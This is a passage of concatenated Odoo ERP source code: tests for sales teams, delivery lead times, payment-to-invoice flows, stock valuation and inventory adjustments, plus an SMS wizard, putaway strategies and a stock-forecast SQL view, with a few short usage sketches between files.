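            return 'SUM(amount)'              # aggregate used for the y axis
        return super(CrmTeam, self)._graph_y_query()

    def _graph_title_and_key(self):
        if self.dashboard_graph_model == 'x_demo.report':
            return ['', _('Demo: Total Amount')]
        return super(CrmTeam, self)._graph_title_and_key()
```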
#### File: sales_team/tests/test_default_team.py
```python
from odoo.tests import common
class TestDefaultTeam(common.SavepointCase):
"""Tests to check if correct default team is found."""
@classmethod
def setUpClass(cls):
"""Set up data for default team tests."""
super(TestDefaultTeam, cls).setUpClass()
cls.CrmTeam = cls.env['crm.team']
ResUsers = cls.env['res.users'].with_context(
{'no_reset_password': True})
group_sale_manager = cls.env.ref('sales_team.group_sale_manager')
cls.user = ResUsers.create({
'name': 'Team User',
'login': 'sales_team_user',
'email': '<EMAIL>',
'groups_id': [(6, 0, [group_sale_manager.id])]
})
cls.team_1 = cls.env['crm.team'].create({
'name': 'Test Team',
'member_ids': [(4, cls.user.id)],
'company_id': False
})
# Europe Team (fall back team)
cls.team_2 = cls.env.ref('sales_team.team_sales_department')
def test_01_user_team(self):
"""Get default team, when user belongs to one."""
team = self.CrmTeam.sudo(self.user)._get_default_team_id()
self.assertEqual(team, self.team_1)
def test_02_fallback_team(self):
"""Get default team when user does not belong to any team.
Case 1: fall back default team (from XML ref) is active.
Case 2: fall back default team is not active.
"""
# Clear users from team.
self.team_1.member_ids = [(5,)]
# Case 1.
team = self.CrmTeam.sudo(self.user)._get_default_team_id()
self.assertEqual(team, self.team_2)
# Case 2.
self.team_2.active = False
team = self.CrmTeam.sudo(self.user)._get_default_team_id()
self.assertEqual(team, self.CrmTeam)
```
#### File: sale_stock/tests/test_sale_stock_lead_time.py
```python
from datetime import timedelta
from odoo import fields
from odoo.addons.stock.tests.common2 import TestStockCommon
class TestSaleStockLeadTime(TestStockCommon):
def setUp(self):
super(TestSaleStockLeadTime, self).setUp()
# Update the product_1 with type and Customer Lead Time
self.product_1.write({'type': 'product',
'sale_delay': 5.0})
def test_00_product_company_level_delays(self):
""" In order to check schedule date, set product's Customer Lead Time
and company's Sales Safety Days."""
company = self.env.ref('base.main_company')
# Update company with Sales Safety Days
company.write({'security_lead': 3.00})
# Create sale order of product_1
order = self.env['sale.order'].create({
'partner_id': self.partner_1.id,
'partner_invoice_id': self.partner_1.id,
'partner_shipping_id': self.partner_1.id,
'pricelist_id': self.env.ref('product.list0').id,
'picking_policy': 'direct',
'warehouse_id': self.warehouse_1.id,
'order_line': [(0, 0, {'name': self.product_1.name,
'product_id': self.product_1.id,
'product_uom_qty': 10,
'product_uom': self.uom_unit.id,
'customer_lead': self.product_1.sale_delay})]})
# Confirm our standard sale order
order.action_confirm()
        # Check whether the picking was created
self.assertTrue(order.picking_ids, "Picking should be created.")
# Check schedule date of picking
out_date = fields.Datetime.from_string(order.date_order) + timedelta(days=self.product_1.sale_delay) - timedelta(days=company.security_lead)
min_date = fields.Datetime.from_string(order.picking_ids[0].scheduled_date)
self.assertTrue(abs(min_date - out_date) <= timedelta(seconds=1), 'Schedule date of picking should be equal to: order date + Customer Lead Time - Sales Safety Days.')
def test_01_product_route_level_delays(self):
""" In order to check schedule dates, set product's Customer Lead Time
and warehouse route's delay."""
# Update warehouse_1 with Outgoing Shippings pick + pack + ship
self.warehouse_1.write({'delivery_steps': 'pick_pack_ship'})
# Set delay on pull rule
for pull_rule in self.warehouse_1.delivery_route_id.rule_ids:
pull_rule.write({'delay': 2})
# Create sale order of product_1
order = self.env['sale.order'].create({
'partner_id': self.partner_1.id,
'partner_invoice_id': self.partner_1.id,
'partner_shipping_id': self.partner_1.id,
'pricelist_id': self.env.ref('product.list0').id,
'picking_policy': 'direct',
'warehouse_id': self.warehouse_1.id,
'order_line': [(0, 0, {'name': self.product_1.name,
'product_id': self.product_1.id,
'product_uom_qty': 5,
'product_uom': self.uom_unit.id,
'customer_lead': self.product_1.sale_delay})]})
# Confirm our standard sale order
order.action_confirm()
        # Check whether the pickings were created
self.assertTrue(order.picking_ids, "Pickings should be created.")
# Check schedule date of ship type picking
out = order.picking_ids.filtered(lambda r: r.picking_type_id == self.warehouse_1.out_type_id)
out_min_date = fields.Datetime.from_string(out.scheduled_date)
out_date = fields.Datetime.from_string(order.date_order) + timedelta(days=self.product_1.sale_delay) - timedelta(days=out.move_lines[0].rule_id.delay)
self.assertTrue(abs(out_min_date - out_date) <= timedelta(seconds=1), 'Schedule date of ship type picking should be equal to: order date + Customer Lead Time - pull rule delay.')
# Check schedule date of pack type picking
pack = order.picking_ids.filtered(lambda r: r.picking_type_id == self.warehouse_1.pack_type_id)
pack_min_date = fields.Datetime.from_string(pack.scheduled_date)
pack_date = out_date - timedelta(days=pack.move_lines[0].rule_id.delay)
self.assertTrue(abs(pack_min_date - pack_date) <= timedelta(seconds=1), 'Schedule date of pack type picking should be equal to: Schedule date of ship type picking - pull rule delay.')
# Check schedule date of pick type picking
pick = order.picking_ids.filtered(lambda r: r.picking_type_id == self.warehouse_1.pick_type_id)
pick_min_date = fields.Datetime.from_string(pick.scheduled_date)
pick_date = pack_date - timedelta(days=pick.move_lines[0].rule_id.delay)
self.assertTrue(abs(pick_min_date - pick_date) <= timedelta(seconds=1), 'Schedule date of pick type picking should be equal to: Schedule date of pack type picking - pull rule delay.')
```
#### File: sale/tests/test_sale_transaction.py
```python
from odoo import tests
from odoo.addons.account.tests.account_test_classes import AccountingTestCase
@tests.tagged('post_install', '-at_install')
class TestSaleTransaction(AccountingTestCase):
def test_sale_invoicing_from_transaction(self):
''' Test the following scenario:
- Create a sale order
- Create a transaction for the sale order.
- Confirm the transaction but no invoice generated automatically.
- Create manually an invoice for this sale order.
=> The invoice must be paid.
'''
product = self.env['product.product'].create({
'name': 'Product A',
})
order = self.env['sale.order'].create({
'partner_id': self.env.ref('base.res_partner_1').id,
'order_line': [
(0, False, {
'product_id': product.id,
'name': '1 Product',
'price_unit': 100.0,
}),
],
})
transaction = order._create_payment_transaction({
'acquirer_id': self.env.ref('payment.payment_acquirer_transfer').id,
})
transaction._set_transaction_done()
transaction._post_process_after_done()
# Assert a posted payment has been generated at this point.
self.assertTrue(transaction.payment_id)
self.assertEqual(transaction.payment_id.state, 'posted')
invoice_ids = order.action_invoice_create()
invoice = self.env['account.invoice'].browse(invoice_ids)
invoice.action_invoice_open()
self.assertEqual(invoice.state, 'paid')
```
#### File: sms/wizard/send_sms.py
```python
import logging
from odoo import api, fields, models, _
from odoo.exceptions import UserError
from odoo.addons.iap.models import iap
_logger = logging.getLogger(__name__)
try:
import phonenumbers
_sms_phonenumbers_lib_imported = True
except ImportError:
_sms_phonenumbers_lib_imported = False
_logger.info(
"The `phonenumbers` Python module is not available. "
"Phone number validation will be skipped. "
"Try `pip3 install phonenumbers` to install it."
)
class SendSMS(models.TransientModel):
_name = 'sms.send_sms'
_description = 'Send SMS'
recipients = fields.Char('Recipients', required=True)
message = fields.Text('Message', required=True)
def _phone_get_country(self, partner):
if 'country_id' in partner:
return partner.country_id
return self.env.user.company_id.country_id
def _sms_sanitization(self, partner, field_name):
number = partner[field_name]
if number and _sms_phonenumbers_lib_imported:
country = self._phone_get_country(partner)
country_code = country.code if country else None
try:
phone_nbr = phonenumbers.parse(number, region=country_code, keep_raw_input=True)
except phonenumbers.phonenumberutil.NumberParseException:
return number
if not phonenumbers.is_possible_number(phone_nbr) or not phonenumbers.is_valid_number(phone_nbr):
return number
phone_fmt = phonenumbers.PhoneNumberFormat.E164
return phonenumbers.format_number(phone_nbr, phone_fmt)
else:
return number
def _get_records(self, model):
if self.env.context.get('active_domain'):
records = model.search(self.env.context.get('active_domain'))
elif self.env.context.get('active_ids'):
records = model.browse(self.env.context.get('active_ids', []))
else:
records = model.browse(self.env.context.get('active_id', []))
return records
@api.model
def default_get(self, fields):
result = super(SendSMS, self).default_get(fields)
active_model = self.env.context.get('active_model')
if not self.env.context.get('default_recipients') and active_model and hasattr(self.env[active_model], '_get_default_sms_recipients'):
model = self.env[active_model]
records = self._get_records(model)
partners = records._get_default_sms_recipients()
phone_numbers = []
no_phone_partners = []
for partner in partners:
number = self._sms_sanitization(partner, self.env.context.get('field_name') or 'mobile')
if number:
phone_numbers.append(number)
else:
no_phone_partners.append(partner.name)
if len(partners) > 1:
if no_phone_partners:
raise UserError(_('Missing mobile number for %s.') % ', '.join(no_phone_partners))
result['recipients'] = ', '.join(phone_numbers)
return result
def action_send_sms(self):
numbers = [number.strip() for number in self.recipients.split(',') if number.strip()]
active_model = self.env.context.get('active_model')
if active_model and hasattr(self.env[active_model], 'message_post_send_sms'):
model = self.env[active_model]
records = self._get_records(model)
records.message_post_send_sms(self.message, numbers=numbers)
else:
self.env['sms.api']._send_sms(numbers, self.message)
return True
```
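
A usage sketch for the wizard above, e.g. from an Odoo shell; it assumes `partners` is a `res.partner` recordset and that the active model implements `_get_default_sms_recipients`, as `default_get` expects:

```python
# Build the wizard in the context of the selected partners so that
# default_get can assemble the 'recipients' string from their mobile numbers.
SendSMS = env['sms.send_sms'].with_context(
    active_model='res.partner',
    active_ids=partners.ids,
    field_name='mobile',
)
defaults = SendSMS.default_get(['recipients'])
wizard = SendSMS.create(dict(defaults, message="Hello from Odoo"))
wizard.action_send_sms()
```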
#### File: stock_account/tests/test_anglo_saxon_valuation_reconciliation_common.py
```python
from odoo.addons.account.tests.account_test_classes import AccountingTestCase
from odoo import fields
class ValuationReconciliationTestCase(AccountingTestCase):
""" Base class for tests checking interim accounts reconciliation works
in anglosaxon accounting. It sets up everything we need in the tests, and is
extended in both sale_stock and purchase modules to run the 'true' tests.
"""
def check_reconciliation(self, invoice, picking, full_reconcile=True, operation='purchase'):
interim_account_id = operation == 'purchase' and self.input_account.id or self.output_account.id
invoice_line = self.env['account.move.line'].search([('move_id','=', invoice.move_id.id), ('account_id', '=', interim_account_id)])
valuation_line = picking.move_lines.mapped('account_move_ids.line_ids').filtered(lambda x: x.account_id.id == interim_account_id)
self.assertEqual(len(invoice_line), 1, "Only one line should have been written by invoice in stock input account")
self.assertEqual(len(valuation_line), 1, "Only one line should have been written for stock valuation in stock input account")
self.assertTrue(valuation_line.reconciled or invoice_line.reconciled, "The valuation and invoice line should have been reconciled together.")
if full_reconcile:
self.assertTrue(valuation_line.full_reconcile_id, "The reconciliation should be total at that point.")
else:
self.assertFalse(valuation_line.full_reconcile_id, "The reconciliation should not be total at that point.")
def _process_pickings(self, pickings, date=False, quantity=False):
if not date:
date = fields.Date.today()
pickings.action_confirm()
pickings.action_assign()
for picking in pickings:
for ml in picking.move_line_ids:
ml.qty_done = quantity or ml.product_qty
pickings.action_done()
self._change_pickings_date(pickings, date)
def _change_pickings_date(self, pickings, date):
pickings.mapped('move_lines').write({'date': date})
pickings.mapped('move_lines.account_move_ids').write({'date': date})
def _create_product_category(self):
return self.env['product.category'].create({
'name': 'Test category',
'property_valuation': 'real_time',
'property_cost_method': 'fifo',
'property_stock_valuation_account_id': self.valuation_account.id,
'property_stock_account_input_categ_id': self.input_account.id,
'property_stock_account_output_categ_id': self.output_account.id,
})
def setUp(self):
super(ValuationReconciliationTestCase, self).setUp()
self.company = self.env['res.company']._company_default_get()
self.company.anglo_saxon_accounting = True
self.currency_one = self.company.currency_id
currency_two_name = 'USD' if self.currency_one.name != 'USD' else 'EUR'
self.currency_two = self.env['res.currency'].search([('name', '=', currency_two_name)])
self.input_account = self.env['account.account'].create({
'name': 'Test stock in',
'code': 'stock_account_TEST_42',
'user_type_id': self.env['account.account.type'].search([],limit=1).id,
'reconcile': True,
'company_id': self.company.id,
})
self.output_account = self.env['account.account'].create({
'name': 'Test stock out',
'code': 'stock_account_TEST_43',
'user_type_id': self.env['account.account.type'].search([],limit=1).id,
'reconcile': True,
'company_id': self.company.id,
})
self.valuation_account = self.env['account.account'].create({
'name': 'Test stock valuation',
'code': 'stock_account_TEST_44',
'user_type_id': self.env['account.account.type'].search([],limit=1).id,
'reconcile': True,
'company_id': self.company.id,
})
self.test_product_category = self._create_product_category()
uom = self.env['uom.uom'].search([], limit=1)
test_product_delivery_inv_template = self.env['product.template'].create({
'name': 'Test product template invoiced on delivery',
'type': 'product',
'categ_id': self.test_product_category.id,
'uom_id': uom.id,
'uom_po_id': uom.id,
})
test_product_order_inv_template = self.env['product.template'].create({
'name': 'Test product template invoiced on order',
'type': 'product',
'categ_id': self.test_product_category.id,
'uom_id': uom.id,
'uom_po_id': uom.id,
})
self.test_product_order = self.env['product.product'].create({
'name': 'The chocolate moose - order',
'product_tmpl_id': test_product_order_inv_template.id,
'standard_price': 42.0,
})
self.test_product_delivery = self.env['product.product'].create({
'name': 'The chocolate moose - delivery',
'product_tmpl_id': test_product_delivery_inv_template.id,
'standard_price': 42.0,
})
self.test_partner = self.env['res.partner'].create({
'name': '<NAME>',
'supplier': True,
'customer': True,
})
self.product_price_unit = 66.0
# We delete the currency rate defined in demo data for USD on June 6th.
# This is mandatory to ensure consistency of the data generated by the test,
# as stock pickings created from a PO are by design always created for
# the current date (there is no way forcing this), meaning that they
# always use today's exchange rate for their valuation.
# Despite the fact we rewrite the date of the valuation moves artificially,
# we cannot correct the debit and credit values, since the anglosaxon
# entries get automatically reconciled (and you cannot modify a reconciled entry).
# So, we have to make sure that "today"'s rate will always be the last rate we
# created in order to ensure complete control of the test.
self.env.ref('base.rateUSDbis').unlink()
```
#### File: stock_dropshipping/models/sale.py
```python
from odoo import api, models, fields
class SaleOrderLine(models.Model):
_inherit = "sale.order.line"
purchase_line_ids = fields.One2many('purchase.order.line', 'sale_line_id')
@api.multi
def _get_qty_procurement(self):
# People without purchase rights should be able to do this operation
purchase_lines_sudo = self.sudo().purchase_line_ids
if purchase_lines_sudo.filtered(lambda r: r.state != 'cancel'):
qty = 0.0
for po_line in purchase_lines_sudo.filtered(lambda r: r.state != 'cancel'):
qty += po_line.product_uom._compute_quantity(po_line.product_qty, self.product_uom, rounding_method='HALF-UP')
return qty
else:
return super(SaleOrderLine, self)._get_qty_procurement()
```
#### File: stock/models/product_strategy.py
```python
from odoo import fields, models, api
class RemovalStrategy(models.Model):
_name = 'product.removal'
_description = 'Removal Strategy'
name = fields.Char('Name', required=True)
method = fields.Char("Method", required=True, help="FIFO, LIFO...")
class PutAwayStrategy(models.Model):
_name = 'product.putaway'
_description = 'Put Away Strategy'
name = fields.Char('Name', required=True)
fixed_location_ids = fields.One2many(
'stock.fixed.putaway.strat', 'putaway_id',
'Fixed Locations Per Product Category', domain=[('category_id', '!=', False)], copy=True)
product_location_ids = fields.One2many(
'stock.fixed.putaway.strat', 'putaway_id',
'Fixed Locations Per Product', domain=[('product_id', '!=', False)], copy=True)
def putaway_apply(self, product):
put_away = self._get_putaway_rule(product)
if put_away:
return put_away.fixed_location_id
return self.env['stock.location']
def _get_putaway_rule(self, product):
if self.product_location_ids:
put_away = self.product_location_ids.filtered(lambda x: x.product_id == product)
if put_away:
return put_away[0]
if self.fixed_location_ids:
categ = product.categ_id
while categ:
put_away = self.fixed_location_ids.filtered(lambda x: x.category_id == categ)
if put_away:
return put_away[0]
categ = categ.parent_id
return self.env['stock.location']
class FixedPutAwayStrategy(models.Model):
_name = 'stock.fixed.putaway.strat'
_order = 'sequence'
_description = 'Fixed Putaway Strategy on Location'
product_id = fields.Many2one('product.product', 'Product')
putaway_id = fields.Many2one('product.putaway', 'Put Away Method', required=True)
category_id = fields.Many2one('product.category', 'Product Category')
fixed_location_id = fields.Many2one('stock.location', 'Location', required=True)
    sequence = fields.Integer('Priority', help="Give the more specialized categories a higher priority to put them at the top of the list.")
```
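
A small sketch of how `putaway_apply` resolves a destination; the records below (`all_products_categ`, `shelf_location`, `product`) are assumed to exist and are purely illustrative:

```python
# Product-specific rules win over category rules; category rules are walked up
# the category hierarchy (categ_id, then its parents) until one matches.
putaway = env['product.putaway'].create({'name': 'Demo putaway'})
env['stock.fixed.putaway.strat'].create({
    'putaway_id': putaway.id,
    'category_id': all_products_categ.id,
    'fixed_location_id': shelf_location.id,
})
dest = putaway.putaway_apply(product)  # -> shelf_location, or an empty stock.location recordset
```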
#### File: stock/report/report_stock_forecast.py
```python
from odoo import api, fields, models, tools
class ReportStockForecast(models.Model):
_name = 'report.stock.forecast'
_auto = False
_description = 'Stock Forecast Report'
date = fields.Date(string='Date')
product_id = fields.Many2one('product.product', string='Product', readonly=True)
product_tmpl_id = fields.Many2one('product.template', string='Product Template', related='product_id.product_tmpl_id', readonly=True)
cumulative_quantity = fields.Float(string='Cumulative Quantity', readonly=True)
quantity = fields.Float(readonly=True)
company_id = fields.Many2one('res.company', string='Company', readonly=True)
@api.model_cr
def init(self):
tools.drop_view_if_exists(self._cr, 'report_stock_forecast')
self._cr.execute("""CREATE or REPLACE VIEW report_stock_forecast AS (SELECT
MIN(id) as id,
product_id as product_id,
date as date,
sum(product_qty) AS quantity,
sum(sum(product_qty)) OVER (PARTITION BY product_id ORDER BY date) AS cumulative_quantity,
company_id
FROM
(SELECT
MIN(id) as id,
MAIN.product_id as product_id,
SUB.date as date,
CASE WHEN MAIN.date = SUB.date THEN sum(MAIN.product_qty) ELSE 0 END as product_qty,
MAIN.company_id as company_id
FROM
(SELECT
MIN(sq.id) as id,
sq.product_id,
date_trunc('week', to_date(to_char(CURRENT_DATE, 'YYYY/MM/DD'), 'YYYY/MM/DD')) as date,
SUM(sq.quantity) AS product_qty,
sq.company_id
FROM
stock_quant as sq
LEFT JOIN
product_product ON product_product.id = sq.product_id
LEFT JOIN
stock_location location_id ON sq.location_id = location_id.id
WHERE
location_id.usage = 'internal'
GROUP BY date, sq.product_id, sq.company_id
UNION ALL
SELECT
MIN(-sm.id) as id,
sm.product_id,
CASE WHEN sm.date_expected > CURRENT_DATE
THEN date_trunc('week', to_date(to_char(sm.date_expected, 'YYYY/MM/DD'), 'YYYY/MM/DD'))
ELSE date_trunc('week', to_date(to_char(CURRENT_DATE, 'YYYY/MM/DD'), 'YYYY/MM/DD')) END
AS date,
SUM(sm.product_qty) AS product_qty,
sm.company_id
FROM
stock_move as sm
LEFT JOIN
product_product ON product_product.id = sm.product_id
LEFT JOIN
stock_location dest_location ON sm.location_dest_id = dest_location.id
LEFT JOIN
stock_location source_location ON sm.location_id = source_location.id
WHERE
sm.state IN ('confirmed','partially_available','assigned','waiting') and
source_location.usage != 'internal' and dest_location.usage = 'internal'
GROUP BY sm.date_expected,sm.product_id, sm.company_id
UNION ALL
SELECT
MIN(-sm.id) as id,
sm.product_id,
CASE WHEN sm.date_expected > CURRENT_DATE
THEN date_trunc('week', to_date(to_char(sm.date_expected, 'YYYY/MM/DD'), 'YYYY/MM/DD'))
ELSE date_trunc('week', to_date(to_char(CURRENT_DATE, 'YYYY/MM/DD'), 'YYYY/MM/DD')) END
AS date,
SUM(-(sm.product_qty)) AS product_qty,
sm.company_id
FROM
stock_move as sm
LEFT JOIN
product_product ON product_product.id = sm.product_id
LEFT JOIN
stock_location source_location ON sm.location_id = source_location.id
LEFT JOIN
stock_location dest_location ON sm.location_dest_id = dest_location.id
WHERE
sm.state IN ('confirmed','partially_available','assigned','waiting') and
source_location.usage = 'internal' and dest_location.usage != 'internal'
GROUP BY sm.date_expected,sm.product_id, sm.company_id)
as MAIN
LEFT JOIN
(SELECT DISTINCT date
FROM
(
SELECT date_trunc('week', CURRENT_DATE) AS DATE
UNION ALL
SELECT date_trunc('week', to_date(to_char(sm.date_expected, 'YYYY/MM/DD'), 'YYYY/MM/DD')) AS date
FROM stock_move sm
LEFT JOIN
stock_location source_location ON sm.location_id = source_location.id
LEFT JOIN
stock_location dest_location ON sm.location_dest_id = dest_location.id
WHERE
sm.state IN ('confirmed','assigned','waiting') and sm.date_expected > CURRENT_DATE and
((dest_location.usage = 'internal' AND source_location.usage != 'internal')
or (source_location.usage = 'internal' AND dest_location.usage != 'internal'))) AS DATE_SEARCH)
SUB ON (SUB.date IS NOT NULL)
GROUP BY MAIN.product_id,SUB.date, MAIN.date, MAIN.company_id
) AS FINAL
GROUP BY product_id,date,company_id)""")
```
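The view defined above exposes one row per product and week, with both the week's quantity and a running cumulative total. Below is a minimal sketch of reading it, assuming the code runs inside any Odoo model method with `self.env` available; the helper name and the `product_id` argument are placeholders, not part of the module.
```python
def _print_forecast(self, product_id):
    # Plain SQL read of the view created in init(); the columns come from the
    # CREATE VIEW statement above.
    self.env.cr.execute("""
        SELECT date, quantity, cumulative_quantity
        FROM report_stock_forecast
        WHERE product_id = %s
        ORDER BY date
    """, (product_id,))
    for date, qty, cum_qty in self.env.cr.fetchall():
        # cumulative_quantity is the window sum of quantity over all weeks up to `date`
        print(date, qty, cum_qty)
```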
#### File: stock/tests/test_inventory.py
```python
from odoo.exceptions import ValidationError
from odoo.tests.common import TransactionCase
class TestInventory(TransactionCase):
def setUp(self):
super(TestInventory, self).setUp()
self.stock_location = self.env.ref('stock.stock_location_stock')
self.pack_location = self.env.ref('stock.location_pack_zone')
self.pack_location.active = True
self.customer_location = self.env.ref('stock.stock_location_customers')
self.uom_unit = self.env.ref('uom.product_uom_unit')
self.product1 = self.env['product.product'].create({
'name': 'Product A',
'type': 'product',
'categ_id': self.env.ref('product.product_category_all').id,
})
self.product2 = self.env['product.product'].create({
'name': 'Product A',
'type': 'product',
'tracking': 'serial',
'categ_id': self.env.ref('product.product_category_all').id,
})
def test_inventory_1(self):
""" Check that making an inventory adjustment to remove all products from stock is working
as expected.
"""
# make some stock
self.env['stock.quant']._update_available_quantity(self.product1, self.stock_location, 100)
self.assertEqual(len(self.env['stock.quant']._gather(self.product1, self.stock_location)), 1.0)
self.assertEqual(self.env['stock.quant']._get_available_quantity(self.product1, self.stock_location), 100.0)
# remove them with an inventory adjustment
inventory = self.env['stock.inventory'].create({
'name': 'remove product1',
'filter': 'product',
'location_id': self.stock_location.id,
'product_id': self.product1.id,
})
inventory.action_start()
self.assertEqual(len(inventory.line_ids), 1)
self.assertEqual(inventory.line_ids.theoretical_qty, 100)
inventory.line_ids.product_qty = 0 # Put the quantity back to 0
inventory.action_validate()
# check
self.assertEqual(self.env['stock.quant']._get_available_quantity(self.product1, self.stock_location), 0.0)
self.assertEqual(sum(self.env['stock.quant']._gather(self.product1, self.stock_location).mapped('quantity')), 0.0)
def test_inventory_2(self):
""" Check that adding a tracked product through an inventory adjustment work as expected.
"""
inventory = self.env['stock.inventory'].create({
'name': 'remove product1',
'filter': 'product',
'location_id': self.stock_location.id,
'product_id': self.product2.id,
'exhausted': True, # should be set by an onchange
})
inventory.action_start()
self.assertEqual(len(inventory.line_ids), 1)
self.assertEqual(inventory.line_ids.theoretical_qty, 0)
lot1 = self.env['stock.production.lot'].create({
'name': 'sn2',
'product_id': self.product2.id,
})
inventory.line_ids.prod_lot_id = lot1
inventory.line_ids.product_qty = 1
inventory.action_validate()
# check
self.assertEqual(self.env['stock.quant']._get_available_quantity(self.product2, self.stock_location, lot_id=lot1), 1.0)
self.assertEqual(len(self.env['stock.quant']._gather(self.product2, self.stock_location, lot_id=lot1)), 1.0)
self.assertEqual(lot1.product_qty, 1.0)
def test_inventory_3(self):
""" Check that it's not posisble to have multiple products with a serial number through an
inventory adjustment
"""
inventory = self.env['stock.inventory'].create({
'name': 'remove product1',
'filter': 'product',
'location_id': self.stock_location.id,
'product_id': self.product2.id,
'exhausted': True, # should be set by an onchange
})
inventory.action_start()
self.assertEqual(len(inventory.line_ids), 1)
self.assertEqual(inventory.line_ids.theoretical_qty, 0)
lot1 = self.env['stock.production.lot'].create({
'name': 'sn2',
'product_id': self.product2.id,
})
inventory.line_ids.prod_lot_id = lot1
inventory.line_ids.product_qty = 2
with self.assertRaises(ValidationError):
inventory.action_validate()
def test_inventory_4(self):
""" Check that even if a product is tracked by serial number, it's possible to add
an untracked one in an inventory adjustment.
"""
inventory = self.env['stock.inventory'].create({
'name': 'remove product1',
'filter': 'product',
'location_id': self.stock_location.id,
'product_id': self.product2.id,
'exhausted': True, # should be set by an onchange
})
inventory.action_start()
self.assertEqual(len(inventory.line_ids), 1)
self.assertEqual(inventory.line_ids.theoretical_qty, 0)
lot1 = self.env['stock.production.lot'].create({
'name': 'sn2',
'product_id': self.product2.id,
})
inventory.line_ids.prod_lot_id = lot1
inventory.line_ids.product_qty = 1
self.env['stock.inventory.line'].create({
'inventory_id': inventory.id,
'product_id': self.product2.id,
'product_uom_id': self.uom_unit.id,
'product_qty': 10,
'location_id': self.stock_location.id,
})
res_dict_for_warning_lot = inventory.action_validate()
wizard_warning_lot = self.env[(res_dict_for_warning_lot.get('res_model'))].browse(res_dict_for_warning_lot.get('res_id'))
wizard_warning_lot.action_confirm()
# check
self.assertEqual(self.env['stock.quant']._get_available_quantity(self.product2, self.stock_location, lot_id=lot1, strict=True), 1.0)
self.assertEqual(self.env['stock.quant']._get_available_quantity(self.product2, self.stock_location, strict=True), 10.0)
self.assertEqual(self.env['stock.quant']._get_available_quantity(self.product2, self.stock_location), 11.0)
self.assertEqual(len(self.env['stock.quant']._gather(self.product2, self.stock_location, lot_id=lot1, strict=True)), 1.0)
self.assertEqual(len(self.env['stock.quant']._gather(self.product2, self.stock_location, strict=True)), 1.0)
self.assertEqual(len(self.env['stock.quant']._gather(self.product2, self.stock_location)), 2.0)
def test_inventory_5(self):
""" Check that assigning an owner does work.
"""
owner1 = self.env['res.partner'].create({'name': 'test_inventory_5'})
inventory = self.env['stock.inventory'].create({
'name': 'remove product1',
'filter': 'product',
'location_id': self.stock_location.id,
'product_id': self.product1.id,
'exhausted': True,
})
inventory.action_start()
self.assertEqual(len(inventory.line_ids), 1)
self.assertEqual(inventory.line_ids.theoretical_qty, 0)
inventory.line_ids.partner_id = owner1
inventory.line_ids.product_qty = 5
inventory.action_validate()
quant = self.env['stock.quant']._gather(self.product1, self.stock_location)
self.assertEqual(len(quant), 1)
self.assertEqual(quant.quantity, 5)
self.assertEqual(quant.owner_id.id, owner1.id)
def test_inventory_6(self):
""" Test that for chained moves, making an inventory adjustment to reduce a quantity that
has been reserved correctly frees the reservation. After that, add products to stock and check
that they're used if the user encodes more than what's available through the chain.
"""
# add 10 products in stock
inventory = self.env['stock.inventory'].create({
'name': 'add 10 products 1',
'filter': 'product',
'location_id': self.stock_location.id,
'product_id': self.product1.id,
'exhausted': True, # should be set by an onchange
})
inventory.action_start()
inventory.line_ids.product_qty = 10
inventory.action_validate()
self.assertEqual(self.env['stock.quant']._get_available_quantity(self.product1, self.stock_location), 10.0)
# Make a chain of two moves, validate the first and check that 10 products are reserved
# in the second one.
move_stock_pack = self.env['stock.move'].create({
'name': 'test_link_2_1',
'location_id': self.stock_location.id,
'location_dest_id': self.pack_location.id,
'product_id': self.product1.id,
'product_uom': self.uom_unit.id,
'product_uom_qty': 10.0,
})
move_pack_cust = self.env['stock.move'].create({
'name': 'test_link_2_2',
'location_id': self.pack_location.id,
'location_dest_id': self.customer_location.id,
'product_id': self.product1.id,
'product_uom': self.uom_unit.id,
'product_uom_qty': 10.0,
})
move_stock_pack.write({'move_dest_ids': [(4, move_pack_cust.id, 0)]})
move_pack_cust.write({'move_orig_ids': [(4, move_stock_pack.id, 0)]})
(move_stock_pack + move_pack_cust)._action_confirm()
move_stock_pack._action_assign()
self.assertEqual(move_stock_pack.state, 'assigned')
move_stock_pack.move_line_ids.qty_done = 10
move_stock_pack._action_done()
self.assertEqual(move_stock_pack.state, 'done')
self.assertEqual(move_pack_cust.state, 'assigned')
self.assertEqual(self.env['stock.quant']._gather(self.product1, self.pack_location).quantity, 10.0)
self.assertEqual(self.env['stock.quant']._get_available_quantity(self.product1, self.pack_location), 0.0)
# Make an inventory adjustment and remove two products from the pack location. This should
# free the reservation of the second move.
inventory = self.env['stock.inventory'].create({
'name': 'remove 2 products 1',
'filter': 'product',
'location_id': self.pack_location.id,
'product_id': self.product1.id,
})
inventory.action_start()
inventory.line_ids.product_qty = 8
inventory.action_validate()
self.assertEqual(self.env['stock.quant']._gather(self.product1, self.pack_location).quantity, 8.0)
self.assertEqual(self.env['stock.quant']._get_available_quantity(self.product1, self.pack_location), 0)
self.assertEqual(move_pack_cust.state, 'partially_available')
self.assertEqual(move_pack_cust.reserved_availability, 8)
# If the user tries to assign again, only 8 products are available and thus the reservation
# state should not change.
move_pack_cust._action_assign()
self.assertEqual(move_pack_cust.state, 'partially_available')
self.assertEqual(move_pack_cust.reserved_availability, 8)
# Make a new inventory adjustment and bring in two new products.
inventory = self.env['stock.inventory'].create({
'name': 'remove 2 products 1',
'filter': 'product',
'location_id': self.pack_location.id,
'product_id': self.product1.id,
})
inventory.action_start()
inventory.line_ids.product_qty = 10
inventory.action_validate()
self.assertEqual(self.env['stock.quant']._get_available_quantity(self.product1, self.pack_location), 2)
# Nothing should have changed for our pack move
self.assertEqual(move_pack_cust.state, 'partially_available')
self.assertEqual(move_pack_cust.reserved_availability, 8)
# Running _action_assign will now find the new available quantity. Indeed, as the products
# are not discernible (no lot/pack/owner), even if the new available quantity is not directly
# brought by the chain, the system will take them into account.
move_pack_cust._action_assign()
self.assertEqual(move_pack_cust.state, 'assigned')
# move all the things
move_pack_cust.move_line_ids.qty_done = 10
move_stock_pack._action_done()
self.assertEqual(self.env['stock.quant']._get_available_quantity(self.product1, self.pack_location), 0)
def test_inventory_7(self):
""" Check that duplicated quants create a single inventory line.
"""
owner1 = self.env['res.partner'].create({'name': 'test_inventory_7'})
vals = {
'product_id': self.product1.id,
'product_uom_id': self.uom_unit.id,
'owner_id': owner1.id,
'location_id': self.stock_location.id,
'quantity': 1,
'reserved_quantity': 0,
}
self.env['stock.quant'].create(vals)
self.env['stock.quant'].create(vals)
self.assertEqual(len(self.env['stock.quant']._gather(self.product1, self.stock_location)), 2.0)
self.assertEqual(self.env['stock.quant']._get_available_quantity(self.product1, self.stock_location), 2.0)
inventory = self.env['stock.inventory'].create({
'name': 'product1',
'filter': 'product',
